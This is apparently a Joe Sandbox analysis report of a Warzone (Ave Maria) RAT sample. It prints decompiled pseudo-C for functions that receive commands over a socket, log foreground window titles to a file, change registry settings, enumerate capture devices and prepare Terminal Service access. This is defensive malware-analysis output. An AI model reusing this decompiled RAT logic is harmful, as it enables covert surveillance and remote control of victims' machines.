                                      				_t117 = __edx;
                                      				_t91 = __ecx;
                                      				E00401130(0x1040, __ecx);
                                      				_t50 = _t91;
                                      				_v12 = _t50;
                                      				if( *((intOrPtr*)(_t50 + 0xc)) != 0xffffffff) {
                                      					_v36 = 0xea60;
                                      					__imp__#21( *((intOrPtr*)(_t50 + 0xc)), 0xffff, 0x1006,  &_v36, 4); // executed
                                      					E00401052( &_v4160, 0, 0x1000);
                                      					_t123 = _t122 + 0xc;
                                      					_t53 = E00403185( &_v16, "warzone160"); // executed
                                      					E00402DCC( &_v52, _t117, _t53);
                                      					E004058FB(_v16);
                                      					_v24 = 0;
                                      					_v20 = 0;
                                      					while(1) {
                                      						_t120 = _t119 | 0xffffffff;
                                      						_t89 = 0x1000;
                                      						_t118 = 0xfffffffe;
                                      						L3:
                                      						L3:
                                      						if(_t120 != 0xffffffff) {
                                      							_t89 =  <  ? _t120 - _t118 : _t89;
                                      						}
                                      						_t57 = _v12;
                                      						__imp__#16( *((intOrPtr*)(_t57 + 0xc)),  &_v4160, _t89, 0); // executed
                                      						_v16 = _t57;
                                      						if(_t57 <= 0) {
                                      							goto L11;
                                      						}
                                      						if(_t120 == 0xffffffff && _t57 >= 0xc) {
                                      							_v32 = _v32 & 0x00000000;
                                      							_v28 = _v28 & 0x00000000;
                                      							E00402D5A( &_v32,  &_v4160, 0xc);
                                      							E00402E12(_t123,  &_v32);
                                      							E00402E12(_t123,  &_v52);
                                      							E00405B00( &_v60, _t117, _t123, _t123,  &_v32,  &_v32);
                                      							_t123 = _t123 + 0x10;
                                      							_t118 = 0;
                                      							_t120 =  *((intOrPtr*)(_v60 + 4)) + 0xc;
                                      							E00402DFF( &_v60);
                                      							E00402DFF( &_v32);
                                      							_t57 = _v16;
                                      						}
                                      						_t118 = _t118 + _t57;
                                      						E00402D5A(_v12 + 0x10,  &_v4160, _t57);
                                      						if(_t118 < _t120) {
                                      							goto L3;
                                      						} else {
                                      							_t119 = _v12 + 0x10;
                                      							E00402D5A( &_v24,  *_t119, _t118);
                                      							E00402E12(_t123,  &_v24);
                                      							E00402E12(_t123,  &_v52);
                                      							E00405B00( &_v44, _t117, _t123, _t123,  &_v24,  &_v24);
                                      							_t123 = _t123 + 0x10;
                                      							E00402D8C(_t119);
                                      							E00402D5A(_t119, _v44, _t118);
                                      							E00402D8C( &_v24);
                                      							E00402D8C( &_v44);
                                      							E00404A77(_v12, _t117, _a4); // executed
                                      							E00402DFF( &_v44);
                                      							continue;
                                      						}
                                      						L11:
                                      						 *((intOrPtr*)( *_a4 + 4))();
                                      						E00402DFF( &_v24);
                                      						return E00402DFF( &_v52);
                                      					}
                                      				}
                                      				return _t50;
                                      			}

























                                      0x004050cc
                                      0x004050cc
                                      0x004050d4
                                      0x004050d9
                                      0x004050e2
                                      0x004050e5
                                      0x004050f0
                                      0x00405105
                                      0x0040511a
                                      0x0040511f
                                      0x0040512a
                                      0x00405133
                                      0x0040513b
                                      0x00405140
                                      0x00405143
                                      0x00405146
                                      0x00405148
                                      0x0040514b
                                      0x00405150
                                      0x00000000
                                      0x00405151
                                      0x00405154
                                      0x0040515f
                                      0x0040515f
                                      0x0040516c
                                      0x00405172
                                      0x00405178
                                      0x0040517d
                                      0x00000000
                                      0x00000000
                                      0x00405186
                                      0x0040518d
                                      0x00405197
                                      0x004051a1
                                      0x004051ae
                                      0x004051bb
                                      0x004051c3
                                      0x004051ce
                                      0x004051d1
                                      0x004051d6
                                      0x004051d9
                                      0x004051e1
                                      0x004051e6
                                      0x004051e6
                                      0x004051ec
                                      0x004051f9
                                      0x00405200
                                      0x00000000
                                      0x00405206
                                      0x0040520d
                                      0x00405212
                                      0x0040521f
                                      0x0040522c
                                      0x00405234
                                      0x00405239
                                      0x0040523e
                                      0x00405249
                                      0x00405251
                                      0x00405259
                                      0x00405263
                                      0x0040526b
                                      0x00000000
                                      0x0040526b
                                      0x00405275
                                      0x0040527a
                                      0x00405280
                                      0x00000000
                                      0x00405288
                                      0x00405146
                                      0x00405291

                                      APIs
                                      • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405105
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
                                        • Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      • recv.WS2_32(000000FF,?,00001000,00000000), ref: 00405172
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$FreeVirtuallstrcpyrecvsetsockopt
                                      • String ID: `$warzone160
                                      • API String ID: 3030020704-811885577
                                      • Opcode ID: 588dd872dce32ade3b3bca8ac52b360bf24bf3ea8917908afc2f702d693b886d
                                      • Instruction ID: 1d6c602b324719ea64b6484aba862982e091331808973946a6b95fe40e6be195
                                      • Opcode Fuzzy Hash: 588dd872dce32ade3b3bca8ac52b360bf24bf3ea8917908afc2f702d693b886d
                                      • Instruction Fuzzy Hash: C0516171900119ABDB04EB95CD8AEEEB778EF04354F10423EF511B71D1DAB85E45CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00407966(void* __ecx, void* __edx, void* __eflags) {
                                      				struct _SECURITY_ATTRIBUTES* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				short _v536;
                                      				struct HWND__* _t34;
                                      				int _t35;
                                      				intOrPtr _t37;
                                      				int _t39;
                                      				intOrPtr _t40;
                                      				WCHAR* _t41;
                                      				intOrPtr _t43;
                                      				void* _t44;
                                      				int _t46;
                                      				intOrPtr _t48;
                                      				intOrPtr _t50;
                                      				long _t54;
                                      				intOrPtr _t55;
                                      				intOrPtr _t57;
                                      				void* _t59;
                                      				intOrPtr _t61;
                                      				intOrPtr _t63;
                                      				long _t65;
                                      				intOrPtr _t66;
                                      				void* _t69;
                                      				void* _t70;
                                      				void* _t73;
                                      				void* _t74;
                                      				intOrPtr _t83;
                                      				void* _t94;
                                      				void* _t97;
                                      				void* _t98;
                                      				void* _t100;
                                      
                                      				_t94 = __edx;
                                      				_v16 = __ecx;
                                      				E00401052( &_v536, 0, 0x208);
                                      				_v8 = 0;
                                      				_t34 = GetForegroundWindow(); // executed
                                      				_t35 = GetWindowTextW(_t34,  &_v536, 0x104);
                                      				_t106 = _t35;
                                      				if(_t35 <= 0) {
                                      					E004030C5( &_v8, _t94, L"{Unknown}");
                                      				} else {
                                      					_t73 = E004033AB( &_v12,  &_v536); // executed
                                      					_t74 = E00403230( &_v8, _t94, _t106, "{"); // executed
                                      					E004030FB(_t74, _t106, _t73); // executed
                                      					E00403230(_t74, _t94, _t106, "}"); // executed
                                      					E004058FB(_v12);
                                      					_v12 = 0;
                                      				}
                                      				_t37 =  *0x4166ac; // 0x416d98
                                      				_t39 = lstrlenW(_t37 + 0x210);
                                      				_t40 =  *0x4166ac; // 0x416d98
                                      				if(_t39 == 0) {
                                      					L6:
                                      					_t41 = _t40 + 0x210;
                                      					__eflags = _t41;
                                      					lstrcpyW(_t41, _v8);
                                      					_t43 =  *0x4166ac; // 0x416d98
                                      					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
                                      				} else {
                                      					_t69 = E004033AB( &_v12, _t40 + 0x210); // executed
                                      					_t70 = E0040300E( &_v8, _t69);
                                      					E004058FB(_v12);
                                      					_t40 =  *0x4166ac; // 0x416d98
                                      					_v12 = 0;
                                      					if(_t70 == 0) {
                                      						goto L6;
                                      					} else {
                                      						 *(_t40 + 0xa10) = 1;
                                      					}
                                      				}
                                      				_t18 = _t43 + 0xc; // 0x2680000, executed
                                      				_t44 = CreateFileW( *_t18, 4, 1, 0, 4, 0x80, 0);
                                      				_t83 =  *0x4166ac; // 0x416d98
                                      				 *(_t83 + 4) = _t44;
                                      				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
                                      					_t21 = _t83 + 8; // 0x416da0
                                      					_t98 = L"\r\n";
                                      					_t54 = lstrlenW(_t98);
                                      					_t55 =  *0x4166ac; // 0x416d98
                                      					_t22 = _t55 + 4; // 0x268, executed
                                      					WriteFile( *_t22, _t98, _t54, _t21, 0);
                                      					_t57 =  *0x4166ac; // 0x416d98
                                      					_t59 = E00403027( &_v8);
                                      					_t61 =  *0x4166ac; // 0x416d98
                                      					_t25 = _t61 + 4; // 0x268, executed
                                      					WriteFile( *_t25, _v8, _t59 + _t59, _t57 + 8, 0);
                                      					_t63 =  *0x4166ac; // 0x416d98
                                      					_t100 = L"\r\n";
                                      					_t65 = lstrlenW(_t100);
                                      					_t66 =  *0x4166ac; // 0x416d98
                                      					_t26 = _t66 + 4; // 0x268, executed
                                      					WriteFile( *_t26, _t100, _t65, _t63 + 8, 0);
                                      					_t83 =  *0x4166ac; // 0x416d98
                                      				}
                                      				_t97 = _v16;
                                      				_t28 = _t83 + 8; // 0x416da0
                                      				_t46 = lstrlenW(_t97);
                                      				_t48 =  *0x4166ac; // 0x416d98
                                      				_t29 = _t48 + 4; // 0x268, executed
                                      				WriteFile( *_t29, _t97, _t46 + _t46, _t28, 0);
                                      				_t50 =  *0x4166ac; // 0x416d98
                                      				_t30 = _t50 + 4; // 0x268, executed
                                      				CloseHandle( *_t30); // executed
                                      				return E004058FB(_v8);
                                      			}



































                                      0x00407966
                                      0x00407979
                                      0x00407984
                                      0x0040798c
                                      0x0040798f
                                      0x004079a2
                                      0x004079a8
                                      0x004079aa
                                      0x004079f5
                                      0x004079ac
                                      0x004079b6
                                      0x004079c5
                                      0x004079cf
                                      0x004079db
                                      0x004079e3
                                      0x004079e8
                                      0x004079e8
                                      0x004079fa
                                      0x00407a0b
                                      0x00407a0f
                                      0x00407a14
                                      0x00407a4f
                                      0x00407a52
                                      0x00407a52
                                      0x00407a58
                                      0x00407a5e
                                      0x00407a63
                                      0x00407a16
                                      0x00407a1f
                                      0x00407a28
                                      0x00407a32
                                      0x00407a37
                                      0x00407a3c
                                      0x00407a41
                                      0x00000000
                                      0x00407a43
                                      0x00407a43
                                      0x00407a43
                                      0x00407a41
                                      0x00407a76
                                      0x00407a79
                                      0x00407a7f
                                      0x00407a91
                                      0x00407a94
                                      0x00407a98
                                      0x00407a9b
                                      0x00407aa2
                                      0x00407aa5
                                      0x00407aab
                                      0x00407aae
                                      0x00407ab0
                                      0x00407ac1
                                      0x00407ac9
                                      0x00407acf
                                      0x00407ad2
                                      0x00407ad4
                                      0x00407ad9
                                      0x00407ae5
                                      0x00407ae8
                                      0x00407aee
                                      0x00407af1
                                      0x00407af3
                                      0x00407af3
                                      0x00407af9
                                      0x00407afc
                                      0x00407b03
                                      0x00407b08
                                      0x00407b0e
                                      0x00407b11
                                      0x00407b13
                                      0x00407b18
                                      0x00407b1b
                                      0x00407b2d

                                      APIs
                                      • GetForegroundWindow.USER32 ref: 0040798F
                                      • GetWindowTextW.USER32 ref: 004079A2
                                      • lstrlenW.KERNEL32(00416B88,{Unknown},?,?), ref: 00407A0B
                                      • lstrcpyW.KERNEL32(00416B88,?), ref: 00407A58
                                      • CreateFileW.KERNEL32(02680000,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00407A79
                                      • lstrlenW.KERNEL32(004127C0,00416DA0,00000000,?,?), ref: 00407AA2
                                      • WriteFile.KERNEL32(00000268,004127C0,00000000,?,?), ref: 00407AAE
                                      • WriteFile.KERNEL32(00000268,?,00000000,00416D90,00000000), ref: 00407AD2
                                      • lstrlenW.KERNEL32(004127C0,00416D90,00000000,?,?), ref: 00407AE5
                                      • WriteFile.KERNEL32(00000268,004127C0,00000000,?,?), ref: 00407AF1
                                      • lstrlenW.KERNEL32(?,00416DA0,00000000,?,?), ref: 00407B03
                                      • WriteFile.KERNEL32(00000268,?,00000000,?,?), ref: 00407B11
                                      • CloseHandle.KERNEL32(00000268), ref: 00407B1B
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                      • String ID: {Unknown}
                                      • API String ID: 2314120260-4054869793
                                      • Opcode ID: e038a5d41f9008b2011a1c5c406468064fc3d129e83e2a0fb709ba3988531c0f
                                      • Instruction ID: 303d7499d8a5dd8a903ce4ae6e17ec2a2eab696862b502e647beeac0fcca0d5e
                                      • Opcode Fuzzy Hash: e038a5d41f9008b2011a1c5c406468064fc3d129e83e2a0fb709ba3988531c0f
                                      • Instruction Fuzzy Hash: 32514FB1A00108BFDB00EB65DD85EDA7BA8EF04304F05817AF509E72A1DB75EE51CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 91%
                                      			E00410A7C(void* __edx, void* __edi, void* __eflags) {
                                      				char _v576;
                                      				char _v592;
                                      				char _v1104;
                                      				short _v1124;
                                      				char _v1200;
                                      				intOrPtr _v1208;
                                      				char _v1212;
                                      				char _v1216;
                                      				char _v1232;
                                      				intOrPtr _v1248;
                                      				intOrPtr _v1272;
                                      				intOrPtr _v1280;
                                      				char _v1284;
                                      				char _v1288;
                                      				int _v1296;
                                      				char _v1304;
                                      				void* _v1308;
                                      				char _v1312;
                                      				char _v1316;
                                      				char _v1320;
                                      				char _v1324;
                                      				intOrPtr _v1336;
                                      				void* _t78;
                                      				char* _t92;
                                      				void* _t96;
                                      				void* _t97;
                                      				void* _t102;
                                      
                                      				_t102 = __eflags;
                                      				_t97 = __edi;
                                      				_t96 = __edx;
                                      				_v1304 = 0xa;
                                      				_v1296 = 0;
                                      				E00405647( &_v1284);
                                      				E0040EF3C( &_v1212);
                                      				E00401085(GetTickCount());
                                      				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1308,  &_v1296); // executed
                                      				RegSetValueExA(_v1308, "MaxConnectionsPer1_0Server", 0, 4,  &_v1304, 4); // executed
                                      				RegSetValueExA(_v1308, "MaxConnectionsPerServer", 0, 4,  &_v1304, 4); // executed
                                      				RegCloseKey(_v1308); // executed
                                      				E0040549D( &_v1284, _t96, _t102); // executed
                                      				E0040EDAA( &_v1212, _t96, _t102,  &_v1284); // executed
                                      				E004049F9( &_v576, _t96, _t102,  &_v1288,  &_v1216); // executed
                                      				E00401052( &_v1104, 0, 0x208);
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1104, _t78); // executed
                                      				lstrcatW( &_v1124, L"\\Microsoft Vision\\");
                                      				CreateDirectoryW( &_v1124, 0); // executed
                                      				_t103 = _v1208;
                                      				if(_v1208 != 0) {
                                      					L3:
                                      					__eflags = _v1248;
                                      					if(__eflags != 0) {
                                      						E0040F628();
                                      					}
                                      					E0040496D( &_v592, _t96, __eflags); // executed
                                      				} else {
                                      					E0040EC15( &_v1232, _t103, _v1280, _v1272); // executed
                                      					_t104 = _v1288;
                                      					if(_v1288 == 0) {
                                      						goto L3;
                                      					} else {
                                      						_v1312 = 0;
                                      						_t92 =  &_v1320;
                                      						E004033F3(_t92,  &_v1200);
                                      						_push(_t92);
                                      						E0040E6C4( &_v1312, _t104,  &_v1324,  &_v1316);
                                      						E004058FB(_v1336);
                                      						E004058FB(0);
                                      					}
                                      				}
                                      				E00404709( &_v592, _t97, _t104);
                                      				E0040EBB6( &_v1232);
                                      				E0040566C( &_v1304, _t97);
                                      				return 0;
                                      			}






























                                      0x00410a7c
                                      0x00410a7c
                                      0x00410a7c
                                      0x00410a8b
                                      0x00410a97
                                      0x00410a9b
                                      0x00410aa4
                                      0x00410ab0
                                      0x00410ad3
                                      0x00410aec
                                      0x00410b05
                                      0x00410b0f
                                      0x00410b19
                                      0x00410b27
                                      0x00410b3d
                                      0x00410b50
                                      0x00410b65
                                      0x00410b78
                                      0x00410b87
                                      0x00410b8d
                                      0x00410b94
                                      0x00410be8
                                      0x00410be8
                                      0x00410bec
                                      0x00410bee
                                      0x00410bee
                                      0x00410bfa
                                      0x00410b96
                                      0x00410ba2
                                      0x00410ba7
                                      0x00410bab
                                      0x00000000
                                      0x00410bad
                                      0x00410bb4
                                      0x00410bb9
                                      0x00410bbd
                                      0x00410bc2
                                      0x00410bd1
                                      0x00410bda
                                      0x00410be1
                                      0x00410be1
                                      0x00410bab
                                      0x00410c06
                                      0x00410c0f
                                      0x00410c18
                                      0x00410c23

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00410AA9
                                      • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,0000000A,?), ref: 00410AD3
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00410AEC
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00410B05
                                      • RegCloseKey.KERNEL32(?), ref: 00410B0F
                                        • Part of subcall function 0040549D: GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 004054BB
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00410B65
                                      • lstrcatW.KERNEL32 ref: 00410B78
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00410B87
                                        • Part of subcall function 0040EC15: CopyFileW.KERNEL32 ref: 0040ECB6
                                        • Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D
                                        • Part of subcall function 0040E6C4: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040E6FF
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Strings
                                      • MaxConnectionsPerServer, xrefs: 00410AFC
                                      • MaxConnectionsPer1_0Server, xrefs: 00410AE3
                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00410AC9
                                      • \Microsoft Vision\, xrefs: 00410B6B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$Value$CloseCopyCountDirectoryFileFolderFreeHandleModulePathProcessTickVirtuallstrcatlstrcpy
                                      • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                      • API String ID: 1409056222-2552559493
                                      • Opcode ID: 087f96d6f3c5d8aae205a1851a7a663cfe75c4ff8a290a4a6167db5a4c37299b
                                      • Instruction ID: 2c1a965c603952f13ef9a272816097f7785e58fc32debb4f15ee24fca69ed625
                                      • Opcode Fuzzy Hash: 087f96d6f3c5d8aae205a1851a7a663cfe75c4ff8a290a4a6167db5a4c37299b
                                      • Instruction Fuzzy Hash: C74102B2048345AFD310EB61DC85EEF77ACFB94304F40493FB695A20A1DB749A58CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 190 410024-41005e CoInitialize CoCreateInstance 191 410064-410070 190->191 192 41017b-41017f 190->192 193 410074-410079 191->193 193->192 194 41007f-410087 193->194 196 410137-41014f 194->196 198 410155-41015a 196->198 199 41008c-4100a5 196->199 200 410165-41016a 198->200 201 41015c-410162 198->201 199->198 206 4100ab-4100ca VariantInit 199->206 202 410175 CoUninitialize 200->202 203 41016c-410172 200->203 201->200 202->192 203->202 209 4100e3-4100ed call 4059a9 206->209 210 4100cc-4100e1 206->210 214 4100fa 209->214 215 4100ef-4100f8 call 4102dc 209->215 210->198 210->209 217 4100fc-410105 214->217 215->217 219 410125-410135 call 4023b2 217->219 220 410107 217->220 219->196 221 410109-410123 220->221 221->219 221->221
                                      C-Code - Quality: 59%
                                      			E00410024(intOrPtr __ecx) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				void* _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				signed short* _v36;
                                      				char _v44;
                                      				signed int* _t43;
                                      				intOrPtr* _t47;
                                      				void* _t48;
                                      				intOrPtr* _t50;
                                      				intOrPtr* _t54;
                                      				signed int _t57;
                                      				char _t60;
                                      				signed int _t61;
                                      				intOrPtr* _t63;
                                      				signed int _t64;
                                      				intOrPtr* _t66;
                                      				intOrPtr* _t67;
                                      				intOrPtr* _t70;
                                      				intOrPtr* _t71;
                                      				void* _t73;
                                      				signed int _t76;
                                      				signed int _t85;
                                      				signed int _t87;
                                      				signed short* _t88;
                                      
                                      				_t87 = 0;
                                      				_v28 = __ecx;
                                      				__imp__CoInitialize(0); // executed
                                      				_t43 =  &_v12;
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				__imp__CoCreateInstance(0x4123c0, 0, 1, 0x414674, _t43); // executed
                                      				_t66 = _v12;
                                      				if(_t66 != 0) {
                                      					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x4123b0,  &_v8, 0);
                                      					_t67 = _v8;
                                      					if(_t67 != 0) {
                                      						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
                                      						_t64 = 0;
                                      						while(1) {
                                      							_t47 = _v8;
                                      							_v20 = _t87;
                                      							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
                                      							if(_t48 != 0) {
                                      								break;
                                      							}
                                      							_t50 = _v24 + _t64 * 4;
                                      							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x412340,  &_v16);
                                      							if(_t48 != 0) {
                                      								break;
                                      							}
                                      							__imp__#8( &_v44);
                                      							_t54 = _v16;
                                      							_push(_t87);
                                      							_push( &_v44);
                                      							_push(L"Description");
                                      							_push(_t54);
                                      							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
                                      								L6:
                                      								_t73 = 0x1c;
                                      								if(E004059A9(_t73) == 0) {
                                      									_t85 = _t87;
                                      								} else {
                                      									_t85 = E004102DC(_t56);
                                      								}
                                      								_t88 = _v36;
                                      								_t57 =  *_t88 & 0x0000ffff;
                                      								if(_t57 == 0) {
                                      									L12:
                                      									 *(_t85 + 8) = _t64;
                                      									E004023B2(_v28 + 4, _t85);
                                      									_t64 = _t64 + 1;
                                      									_t87 = 0;
                                      									continue;
                                      								} else {
                                      									_t76 = _t57;
                                      									do {
                                      										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
                                      										_t60 =  *_t88;
                                      										_t88 =  &(_t88[1]);
                                      										 *((char*)(_t87 +  *_t85)) = _t60;
                                      										_t87 = _t87 + 1;
                                      										_t61 =  *_t88 & 0x0000ffff;
                                      										_t76 = _t61;
                                      									} while (_t61 != 0);
                                      									goto L12;
                                      								}
                                      							}
                                      							_t63 = _v16;
                                      							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
                                      							if(_t48 != 0) {
                                      								break;
                                      							}
                                      							goto L6;
                                      						}
                                      						_t70 = _v8;
                                      						if(_t70 != 0) {
                                      							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
                                      							_v8 = _t87;
                                      						}
                                      						_t71 = _v12;
                                      						if(_t71 != 0) {
                                      							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
                                      							_v12 = _t87;
                                      						}
                                      						__imp__CoUninitialize();
                                      						return _t48;
                                      					}
                                      				}
                                      				return _t43;
                                      			}






























                                      0x0041002d
                                      0x0041002f
                                      0x00410033
                                      0x00410039
                                      0x0041003c
                                      0x0041004d
                                      0x00410050
                                      0x00410053
                                      0x00410059
                                      0x0041005e
                                      0x00410071
                                      0x00410074
                                      0x00410079
                                      0x00410082
                                      0x00410085
                                      0x00410137
                                      0x00410137
                                      0x00410141
                                      0x0041014a
                                      0x0041014f
                                      0x00000000
                                      0x00000000
                                      0x00410099
                                      0x004100a0
                                      0x004100a5
                                      0x00000000
                                      0x00000000
                                      0x004100af
                                      0x004100b5
                                      0x004100bb
                                      0x004100bc
                                      0x004100bd
                                      0x004100c4
                                      0x004100ca
                                      0x004100e3
                                      0x004100e5
                                      0x004100ed
                                      0x004100fa
                                      0x004100ef
                                      0x004100f6
                                      0x004100f6
                                      0x004100fc
                                      0x004100ff
                                      0x00410105
                                      0x00410125
                                      0x00410129
                                      0x0041012f
                                      0x00410134
                                      0x00410135
                                      0x00000000
                                      0x00410107
                                      0x00410107
                                      0x00410109
                                      0x0041010c
                                      0x00410112
                                      0x00410114
                                      0x00410117
                                      0x0041011a
                                      0x0041011b
                                      0x0041011e
                                      0x00410120
                                      0x00000000
                                      0x00410109
                                      0x00410105
                                      0x004100cc
                                      0x004100dc
                                      0x004100e1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004100e1
                                      0x00410155
                                      0x0041015a
                                      0x0041015f
                                      0x00410162
                                      0x00410162
                                      0x00410165
                                      0x0041016a
                                      0x0041016f
                                      0x00410172
                                      0x00410172
                                      0x00410175
                                      0x00000000
                                      0x00410175
                                      0x00410079
                                      0x0041017f

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00410033
                                      • CoCreateInstance.OLE32(004123C0,00000000,00000001,00414674,?), ref: 00410053
                                      • VariantInit.OLEAUT32(?), ref: 004100AF
                                      • CoUninitialize.OLE32 ref: 00410175
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInitInitializeInstanceUninitializeVariant
                                      • String ID: Description$FriendlyName
                                      • API String ID: 4142528535-3192352273
                                      • Opcode ID: 6d20e00ca966b8dbfdfbaa11dbd1bdf627fece8503d30d63524169da3f77f178
                                      • Instruction ID: 1679b5daa5e56776667f780f310485ebc2bb9a6e1d215311ad91f329a2dc5fe0
                                      • Opcode Fuzzy Hash: 6d20e00ca966b8dbfdfbaa11dbd1bdf627fece8503d30d63524169da3f77f178
                                      • Instruction Fuzzy Hash: 91413574A00209AFCB14DFA5C984EEFBBB9FF89704B14845EE501EB250D7B9D981CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 79%
                                      			E0040C74B(void* __ecx, void* __edx) {
                                      				char _v8;
                                      				intOrPtr* _t6;
                                      				void* _t9;
                                      				void* _t10;
                                      				void* _t14;
                                      				void* _t22;
                                      				void* _t31;
                                      				intOrPtr _t32;
                                      				void* _t50;
                                      				intOrPtr _t53;
                                      				void* _t62;
                                      
                                      				_t50 = __edx;
                                      				_push(__ecx);
                                      				InitializeCriticalSection(0x417cc8);
                                      				_t53 = 5;
                                      				asm("xorps xmm0, xmm0");
                                      				 *0x417d14 = _t53;
                                      				 *0x417d0c = _t53;
                                      				_t31 = 0x18;
                                      				asm("movups [0x417ce0], xmm0");
                                      				 *0x417cf0 = 0;
                                      				asm("movups [0x417cf8], xmm0");
                                      				 *0x417d10 = 0;
                                      				_t6 = E004059A9(_t31);
                                      				if(_t6 == 0) {
                                      					_t32 = 0;
                                      				} else {
                                      					 *_t6 = _t53;
                                      					_t1 = _t6 + 4; // 0x4
                                      					_t32 = _t1;
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      				}
                                      				 *0x417d08 = _t32;
                                      				 *0x417d20 = 0;
                                      				 *0x417d24 = 0; // executed
                                      				E004030C5(0x417cf0, _t50, L"TermService"); // executed
                                      				_t54 = L"%ProgramFiles%";
                                      				E004030C5(0x417cfc, _t50, L"%ProgramFiles%"); // executed
                                      				_t9 = E0040D780(0x417cfc);
                                      				_t65 = _t9 - 1;
                                      				if(_t9 != 1) {
                                      					_t51 = 0x417cfc;
                                      					_t10 = E00402F9A( &_v8, 0x417cfc, __eflags);
                                      					_t62 = 0x417d00;
                                      					E004031FD(0x417d00, _t10);
                                      					E004058FB(_v8);
                                      				} else {
                                      					E004030C5(0x417cfc, _t50, L"%ProgramW6432%"); // executed
